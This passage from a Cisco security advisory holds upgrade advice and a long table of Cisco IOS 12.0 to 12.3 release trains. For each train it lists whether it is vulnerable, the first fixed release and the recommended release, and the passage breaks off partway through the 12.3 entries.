devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible
releases that contain the fix (the "First Fixed Release") and the
anticipated date of availability for each are listed in the "Rebuild"
and "Maintenance" columns. A device running a release in the given
train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later
version (greater than or equal to the First Fixed Release label).
For more information on the terms "Rebuild" and "Maintenance,"
consult the following URL:
http://www.cisco.com/warp/public/620/1.html
+----------------------------------------+
| Major | Availability of Repaired |
| Release | Releases |
|------------+---------------------------|
| Affected | First Fixed | Recommended |
| 12.0-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0DA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0DB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0DC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | 12.0(33)S3; | |
| 12.0S | Available | |
| | on | |
| | 03-APR-2009 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SC | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SL | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0SP | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0ST | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SX | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SY | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SZ | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0T | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.0(3c)W5 |
| 12.0W | first fixed | (8) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0WC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.0WT | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.0XF | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XG | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Releases | |
| | prior to | |
| | 12.0(4)XI2 | |
| | are | |
| | vulnerable, | |
| 12.0XI | release | 12.4(15) |
| | 12.0(4)XI2 | T812.4(23) |
| | and later | |
| | are not | |
| | vulnerable; | |
| | first fixed | |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XJ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XK | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XL | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XM | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XN | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XQ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XS | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XT | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XV | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.1-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1AA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1AX | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1AY | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1AZ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1CX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1DA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1DB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1DC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.1E | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1EA | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| 12.1EB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(33) |
| 12.1EC | first fixed | SCA212.2 |
| | in 12.3BC | (33)SCB12.3 |
| | | (23)BC6 |
|------------+-------------+-------------|
| 12.1EO | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(31) |
| 12.1EU | first fixed | SGA912.2 |
| | in 12.2SG | (50)SG |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.1EV | first fixed | S1212.2(33) |
| | in 12.4 | SB312.4(15) |
| | | T812.4(23) |
|------------+-------------+-------------|
| | | 12.2(31) |
| | Vulnerable; | SGA912.2 |
| 12.1EW | first fixed | (50)SG12.4 |
| | in 12.4 | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1EX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.1EY | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1EZ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1GA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1GB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1T | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XF | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XG | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XI | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XJ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XL | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XM | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XP | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XQ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XS | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XT | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XU | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XV | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XW | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XY | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XZ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Releases | |
| | prior to | |
| | 12.1(5)YE6 | |
| | are | |
| | vulnerable, | |
| 12.1YE | release | 12.4(15) |
| | 12.1(5)YE6 | T812.4(23) |
| | and later | |
| | are not | |
| | vulnerable; | |
| | first fixed | |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YF | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.1YI | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1YJ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.2-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2B | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2BC | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2BW | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(33) |
| 12.2BX | first fixed | SB312.4(15) |
| | in 12.4 | T812.4(23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2BY | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2BZ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2CX | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2CY | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.2CZ | first fixed | S1212.2(33) |
| | in 12.2SB | SB3 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2DA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2DD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2DX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(31) |
| 12.2EW | first fixed | SGA912.2 |
| | in 12.2SG | (50)SG |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(31) |
| 12.2EWA | first fixed | SGA912.2 |
| | in 12.2SG | (50)SG |
|------------+-------------+-------------|
| 12.2EX | 12.2(40)EX | 12.2(44)EX1 |
|------------+-------------+-------------|
| | 12.2(44)EY; | 12.2(46)EY; |
| 12.2EY | Available | Available |
| | on | on |
| | 30-JAN-2009 | 23-JAN-2009 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2EZ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2FX | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(44) |
| 12.2FY | first fixed | EX112.2(44) |
| | in 12.2EX | SE4 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2FZ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| 12.2IRA | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2IRB | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2IXA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXF | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXG | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2JA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2JK | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2MB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2MC | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2S | first fixed | 12.2(20)S12 |
| | in 12.2SB | |
|------------+-------------+-------------|
| | 12.2(33) | |
| | SB12.2(31) | |
| 12.2SB | SB14; | 12.2(33)SB3 |
| | Available | |
| | on | |
| | 16-JAN-2009 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SBC | first fixed | 12.2(33)SB3 |
| | in 12.2SB | |
|------------+-------------+-------------|
| 12.2SCA | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SCB | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SE | 12.2(40)SE | 12.2(44)SE4 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEA | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEB | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEC | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SED | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEE | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEF | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(44) |
| 12.2SEG | first fixed | EX112.2(44) |
| | in 12.2EX | SE4 |
|------------+-------------+-------------|
| 12.2SG | 12.2(44)SG | 12.2(50)SG |
|------------+-------------+-------------|
| 12.2SGA | 12.2(31) | 12.2(31) |
| | SGA9 | SGA9 |
|------------+-------------+-------------|
| 12.2SL | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SM | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SO | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SQ | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SR | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SRA | migrate to | 12.2(33) |
| | any release | SRC3 |
| | in 12.2SRC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SRB | migrate to | 12.2(33) |
| | any release | SRC3 |
| | in 12.2SRC | |
|------------+-------------+-------------|
| 12.2SRC | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SRD | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2STE | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2SU | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.2SV | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SW | first fixed | 12.4(15)T8 |
| | in 12.4SW | |
|------------+-------------+-------------|
| 12.2SX | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXF | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SXH | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SXI | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.2SY | first fixed | S1212.2(33) |
| | in 12.2SB | SB3 |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.2SZ | first fixed | S1212.2(33) |
| | in 12.2SB | SB3 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2T | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2TPC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2XF | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XG | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XI | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XJ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XK | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XL | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XM | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | | 12.2(20) |
| | | S1212.2(33) |
| | | SB312.2(33) |
| 12.2XN | 12.2(33)XN1 | SRC312.2 |
| | | (33) |
| | | XNA212.2 |
| | | (33r)SRD2 |
|------------+-------------+-------------|
| 12.2XNA | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2XNB | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | 12.2(46)XO; | 12.2(46)XO; |
| 12.2XO | Available | Available |
| | on | on |
| | 02-FEB-2009 | 02-FEB-2009 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XQ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XS | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XT | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XU | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XV | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2XW | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2YA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2YB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YF | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YG | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YH | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YJ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YK | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YL | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2YM | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.2YN | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YO | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2YP | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2YQ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YR | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YS | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2YT | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YU | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YV | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YW | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YX | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YY | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2YZ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Releases | |
| | prior to | |
| | 12.2(13)ZC | |
| | are | |
| 12.2ZC | vulnerable, | |
| | release | |
| | 12.2(13)ZC | |
| | and later | |
| | are not | |
| | vulnerable; | |
|------------+-------------+-------------|
| 12.2ZD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2ZE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2ZF | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2ZG | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2ZH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.2ZJ | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZL | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZP | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2ZU | migrate to | |
| | any release | |
| | in 12.2SXH | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2ZX | first fixed | 12.2(33)SB3 |
| | in 12.2SB | |
|------------+-------------+-------------|
| 12.2ZY | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2ZYA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.3-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3B | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3BC | 12.3(23)BC6 | 12.3(23)BC6 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3BW | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3EU | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.3JA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JEA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JEB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JEC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.3JK | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.3JL | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.3JX | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
